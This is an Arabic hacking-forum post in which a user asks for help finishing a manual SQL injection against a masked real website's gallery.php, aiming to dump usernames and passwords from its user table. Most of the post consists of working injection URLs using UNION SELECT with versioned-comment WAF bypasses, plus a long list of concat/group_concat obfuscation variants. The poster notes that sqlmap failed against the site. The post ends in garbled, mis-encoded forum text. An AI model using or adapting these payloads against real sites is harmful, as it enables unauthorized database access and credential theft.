السلام عليكم و رحمه الله و بركاته
اخواني تواجهني مشكله ممله حصلت معي كثيرا و لم اجد لها حلولا لا باللغه العربيه ولا بالانجليزية
المشكله تكمن في اخر خطوات الحقن
مع العلم اني استخدمت حقن مشفره وفلاتر ليتم التخطي و نجحت الا في اخر خطوه عند طلب المعلمومات من الجدول تظهر الصفحه بيضاء
هذه هي الحقنه المستخدمه
كود PHP:
www****.com/gallery.php?category_id=-37+/*!12345UNION*/+/*!12345SELECT*/+1,/!*12345concat*/(Username,0x3a,Password)*/,3,4,5,6,7,8,9,10,11+from+user--
الصفحه لا يظهر بها اي شيء على عكس الاستعلام عن اسماء الجداول بالحقنه التاليه
كود PHP:
www****.com/gallery.php?category_id=-37+/*!12345UNION*/+/*!12345SELECT*/+1,/*!12345concat*/%28column_name%29,3,4,5,6,7,8,9,10,11/*!from*//*!information_schema.columns*/+where%20table_name=0x7573657273--
هذه بعض التحطيات التي استخدمتها ولم تنفع في group_concat
==============
Group_Concat
group_concat()
/*!group_concat*/()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose %22%29
CoNcAt()
CONCAT(DISTINCT Version())
concat(,0x3a,)
concat%00()
%00CoNcAt()
/*!50000cOnCat*/(/*!Version()*/)
/*!50000cOnCat*/
/**//*!12345cOnCat*/(,0x3a,)
concat_ws()
concat(0x3a,,0x3c62723e)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
=================
برجاء الافاده من اين يكون الخلل مع العلم انها ليست المرة الاولى التي اصادف هذه المشكله
واستعملت اداه sqlmap ولكن الموقع حمايته قويه و لم استطيع التعامل معه الا بالحقن اليدوي ....
تحياتي ...
Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC la;gi uk] j'fdr hov o',hj hgprk ggpw,g ugn fdhkhj hgrhu]i group_concat
08-19-2015, 01:17 AM
مجاب: مشكله عند تطبيق اخر خطوات الحقن للحصول على بيانات القاعده group_concat 
أفضل جواب - كتبه SoLiTair4Ever 
العرض العادي
